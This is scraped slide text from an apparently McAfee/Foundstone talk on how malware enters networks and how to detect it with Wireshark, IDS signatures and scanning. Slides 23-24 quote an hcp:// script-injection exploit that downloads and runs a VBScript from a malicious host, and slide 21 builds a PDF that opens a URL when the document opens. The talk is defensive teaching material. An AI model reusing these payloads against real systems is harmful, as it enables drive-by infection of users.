Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Taming worms, rats, dragons & more
1. An Intel company
‘Taming Worms, RATs,
Dragons,tjombies & More….’
By Christiaan Beek
2. Agenda
An Intel company
• whoami
• The game has changed
• How malware enters your network
• What goes wrong
• Wireshark Kung-Fu
• Countermeasures
• Resources & credits
• Wrap up
LEGO® is a trademark of the LEGO Group of companies which does not sponsor, authorize or endorse this
presentation.
3. > whoami
An Intel company
• Christiaan Beek
• Principal Architect
• Foundstone EMEA IR & Forensics
• Developer/Instructor MFIRE
4. The game has changed
An Intel company
MANU- MEDICAL
FACTURING DEVICE
ENERGY DATABASE
SCADA
MOBILE
EMBEDDED
RSA DuQu
SILICON
SMART CARS NIGHT
DRAGON
STUXNET
SOCIAL
AURORA ZEUS MEDIA
ATM/KIOSK
APPS
ENTERTAINMENT
VIRTUAL
RF/IR WEB
BLUETOOTH
5. The game has changed
Total Malware Samples
70,000,000
60,000,000
50,000,000
40,000,000
30,000,000
20,000,000
10,000,000
0
McAfee threat landscape Q2 report
7. Some statistics
An Intel company
The Gulf region gains interest by malware authors:
• Number of internet users growing
• Windows XP most used OS
• Vulnerable IE or PDF readers
8. Some statistics
An Intel company
Did you know:
• Internet Explorer 6 has more than 473 public known
vulnerabilities
• So…..
17. How malware enters your network
An Intel company
Hint:
‘ it is between the keyboard and the chair ’
18. How malware enters your network
An Intel company
Top infection vectors:
• Users browsing websites which have been infected
with no outward sign of the compromise
• Open attachments
• Or:
21. How malware enters your network
An Intel company
With a little effort……
# Create a simple PDF document with Origami
contents = ContentStream.new
contents.write ‘Black Hat Sneak Peek',
:x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 15
PDF.new.append_page(Page.new.setContents(contents)).save(‘Sneak peek.pdf')
pdf = PDF.read(“Sneak peek.pdf")
pdf.onDocumentOpen Action::URI.new('http://securitybananas.com')
pdf.save(‘Sneak peek bhatpdf')
22. How malware enters your network
An Intel company
After x redirects: script
executed: grab info
23. How malware enters your network
An Intel company
hcp://services/search?query=anything&topic=hcp://
system/sysinfo/sysinfomain.htm%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A..%5C..%5Csysinfomain.htm%u003fsvr=<script
defer>eval(Run(String.fromCharCode(99,109,100,32,47
,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,3
4,58,87,105,116,104,32,67,114,101,97,116,101,79,98,1
06,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,
84,84,80,34,41,58,46,111,112,101,110,
24. How malware enters your network
An Intel company
hcp://services/search?query=anything&topic=hcp://system/sysinf
o/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%
A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u0
03fsvr=<script defer>eval(Run(String.fromCharCode (cmd /c
echo B="l.vbs":With CreateObject ("MSXML2.XMLHTTP")
:.open
"GET","http://malicioushostsite.com/content/hcp_vbs.php?f=16
6::60&d=0::0",false:.send():Set A =
CreateObject("Scripting.FileSystemObject"):Set
D=A.CreateTextFile(A.GetSpecialFolder(2) + "" +
B):D.WriteLine .responseText:End
With:D.Close:CreateObject("WScript.Shell").Run
A.GetSpecialFolder(2) + "" + B > %TEMP%l.vbs &&
%TEMP%l.vbs && taskkill /F /IM helpctr.exe)))
25. How malware enters your network
An Intel company
Info sent:
Browser version
Operating System
Adobe version
Flash version
Java version
Etc.
26. How malware enters your network
An Intel company
var jver = [0, 0, 0, 0], pdfver = [0, 0, 0, 0], flashver =
[0, 0, 0, 0];
try {var PluginDetect = {handler : function (c, b,
a){return function (){c(b, a)}
[………….]
initScript:function(){var c=this,a=navigator,
e="/",i=a.userAgent|
|"",g=a.vendor||"",b=a.platform||"",h=a.product||"
";c.OS=100;if(b){var
f,d=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,
"iPhone",21.1,"iPod",21.2, "iPad",21.3,"Win. *
CE",22.1,"Win. * Mobile",22.2,"Pocket s * PC",22.3,"
27. How malware enters your network
An Intel company
Info gathered:
Browser version
Operating System
Adobe version
Flash version
Java version
Etc.
30. How malware traffic is hiding
An Intel company
► Techniques used to hide traffic:
• Disguising malicious traffic as web traffic
• Shortened or encoded URLs
• IRC over http
39. Custom /targeted malware An Intel company
► Some recent samples of malware:
• spreading: shares, USB-media, .exe infections
• Search for Autocomplete information
• Search for specific accounts
• Keylogger
• Created task to check if keylogger was running
• Masked in dll files
• Upload results to ftp servers
43. Wireshark An Intel company
Which filters can be used?
First: tcp.dstport = =80 and http contains “GET”
After analyzing this output fine-tuning filter:
tcp.dstport == 80 and http contains "GET" and ip.dst_host ==
67.2**.***.***
44. Wireshark An Intel company
►Which filters can be used?
DNS queries:
dns contains “ru” or dns contains “cn” or dns contains
“biz” or dns contains “dyndns.org or dns contains cc”
45. T-shark An Intel company
►T-shark: command line:
47. Custom /targeted malware An Intel company
► Chinese Gh0st RAT
• Full analysis by Foundstone’s Michael G.Spohn
• example of Chinese RAT used in several campaigns
• research project to understand working
49. Custom /targeted malware An Intel company
► Network analysis of Chinese Gh0st RAT
• Command & Control (C2) packets consists of:
1. A five byte packet header - contains the characters ‘Gh0st’.
2. A four byte integer that contains the size in bytes of the
entire packet.
3. A four byte integer that contains the size in bytes of the
entire packet when uncompressed.
4. A variable sized packet that contains the packet payload.
The client sends small requests that contain commands,
and the server responds to those commands with the
requested data.
61. Wireshark An Intel company
►SMB worm creating .exe on share:
smb.create.action == 2 and smb.file contains "exe"
62. Wireshark An Intel company
► SMB .exe detection:
In old days: smb.file contains "exe"
63. Wireshark An Intel company
► SMB .exe detection:
Taddong developed a tool to capture smb in Wireshark
But… good news
It’s now integrated in Wireshark Version 1.5.1 (Dev)
64. Wireshark An Intel company
► SMB .exe detection:
File > Export > objects > SMB
65. Wireshark An Intel company
► SMB .exe detection:
70. Countermeasures An Intel company
► Implement IDS rules to monitor/report RDP and
VNC protocol use (particularly from the internet):
RDP = "|43 6f 6f 6b 69 65 3a 20 6d 73 74 73 68 61 73 68|“
TPKT (RDP) = "|03 00 00 0b 06 e0|"; "|b8 e5 0d 3d 16 00|“
VNC = "|52 46 42 20 30 30 33 2e 30 30|"
71. Countermeasures An Intel company
► Implement IDS rules to monitor for CMD shell
usage over the network from the internet or
across firewalls:
CMD = "|0a 0a|C|3a 5c|"; "|0a 0a|C|3a 5c|WINDOWS|5c|";
► Implement new signatures in IDS/DLP as they
are learned
72. Countermeasures An Intel company
► Detect services on non-standard ports
► Nmap the internal network:
nmap -sS -p <ports> -oG results.nmap <IP or subnet
range>
73. Countermeasures An Intel company
► Detect services on non-standard ports
► Probe discovered ports with Amap
amap -A -b -o out.amap <IP> <port> <port> ...
or use the results.nmap file as input
74. Countermeasures An Intel company
► Implement IDS/HIPS/DLP rules to detect
outbound GET requests:
Files by type (.exe, .bat, .dll etc.) in URL
GET http://scan28.dosmokes.ce.ms/
InstallSystemDefender_133.bin HTTP/1.0
GET
http://webmoviefiles.in/DownloaderThe.Queen.of.Fighters.450
94.exe HTTP/1.1
75. Countermeasures An Intel company
► Implement IDS/HIPS/DLP rules to detect
Encoded URL extensions:
GET
http://220407db0435.thoseros.com/get2.php?c=PXWSQSZT&d=26606B67393230312E6
4636F317E3E3D2120222724243078747D456E7579232843471710111510015D404E166
E6F1F6C06740A00050701750C787B7A0504080876787777777377707C0C0C0E6A2F2
7212634206E656D637130303E66386B3F6E575003534204020A55584C041F1B0B1D4D
442D42522A021413444A4B4E4E4F4FB7B8B2B5A2F5F4E8EBB4CFF3FCE1E1FDF5E3
BCD6CCD0B0FBFCA8C5FEA1ADB8FCCCCFD6FCC1989 781DF9F9E969C8BCDC1D4
DD8FE6E7858686FCFBFB8DFE888D8AF5EFA3AEEAB6A9A9B1E7A9A4A1EBA7ABB1
A5B7EEE5E6E6E6EFEBEDEBEAE8F89AAFB3 HTTP/1.1
76. Countermeasures An Intel company
► Implement IDS/HIPS/DLP rules to detect
MIME/Base64-encoded URL extensions
GET
http://65.75.156.141/Home/d.php?f=16&e=about.ex
e HTTP/1.1
GET
http://65.75.156.141/Home/d.php?f=MTYmZT1hYm
91dC5leGU== HTTP/1.1
77. Wrap up An Intel company
► What have you learned?
• the game has changed
• malware uses all kind of ways to hide it selves
• Many tools to detect malware
• but….
• invest in learning the tools and how malware works
• define a defense-in-depth malware strategy
• create awareness
• educate administrators AND Management AND users
78. Resources & credits An Intel company
► Resources
• Wireshark (http://www.wireshark.org)
• Snort (http://www.sourcefire.com)
• Nmap – (http://www.insecure.org)
• Amap – (http://www.thc.org/thc-amap/)
► Special thanks to
• Michael G. Spohn
• Shane Shook
• Tony Lee
• Carric Dooley
79. Shukran/Thank you! An Intel company
► Keep in touch:
• Christiaan_Beek @McAfee dot com
► Twitter:
• @FSEMEA
• @Foundstone
• @ChristaanBeek